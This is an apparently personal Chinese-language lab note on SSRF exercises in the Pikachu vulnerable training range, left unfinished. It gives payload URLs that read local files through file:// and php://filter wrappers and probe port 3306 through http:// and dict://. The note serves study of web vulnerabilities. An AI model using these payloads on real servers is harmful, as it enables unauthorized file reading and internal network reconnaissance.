ssrf是攻击者伪造服务器端发起请求的漏洞
- 读取服务器内部文件
- 端口扫描
- 攻击脆弱的内网应用
pikachu靶场
cURL
0x01 读文件
http://localhost/pikachu/vul/ssrf/ssrf_curl.php?url=file://c:/test.txt
0x02 探测主机端口信息
http://localhost/pikachu/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1:3306/info
http://localhost/pikachu/vul/ssrf/ssrf_curl.php?url=dict://127.0.0.1:3306/info
在cmd输入curl --version可查看curl支持的协议
file_get_content
读文件
php伪协议读文件
http://localhost/pikachu/vul/ssrf/ssrf_fgc.php?file=php://filter/read=convert.base64-encode/resource=c://test.txt
(待续)